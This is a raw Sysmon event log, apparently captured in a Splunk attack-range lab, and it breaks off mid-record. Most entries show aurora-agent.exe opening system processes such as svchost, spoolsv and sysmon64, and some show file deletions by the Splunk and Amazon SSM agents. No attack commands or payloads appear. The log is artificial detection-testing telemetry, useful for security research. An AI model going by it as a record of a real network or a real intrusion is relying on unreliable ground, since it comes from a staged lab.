12:17:41.423{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F04851540F5042D8A50342B260260B7F,SHA256=D07D5C853A877B3CB9835B8D411D2940489582F64774A85B75DFC3A5039882A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:41.165{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22E8809BA77C0A084F4517895A38D02A,SHA256=A6CF3AE422A3B066013029CD7E6D58FEE86F07A1D0654A9D966AB7E56F1F8A14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:41.052{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-039MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015354Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015353Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015352Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015351Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.717{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015350Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015349Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.710{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015348Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015347Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.706{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015346Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.705{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015345Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.699{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015344Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.698{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015343Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.691{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015342Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.688{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015341Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.687{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015340Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.678{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015339Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.676{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015338Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.669{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015337Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.666{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015336Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.646{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015335Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.637{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015334Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.628{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 23542300x800000000000000015333Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.626{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF3E24861581B8482DDD1A5F02007826,SHA256=183039838E60E6D504754FEBF8A4A71BAA20FF77F3A2A9F234FA8DDEE373630D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015332Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.620{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015331Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.610{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015330Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.581{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015329Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.575{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015328Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.570{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015327Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.560{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015326Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015325Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.543{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015324Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.536{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program 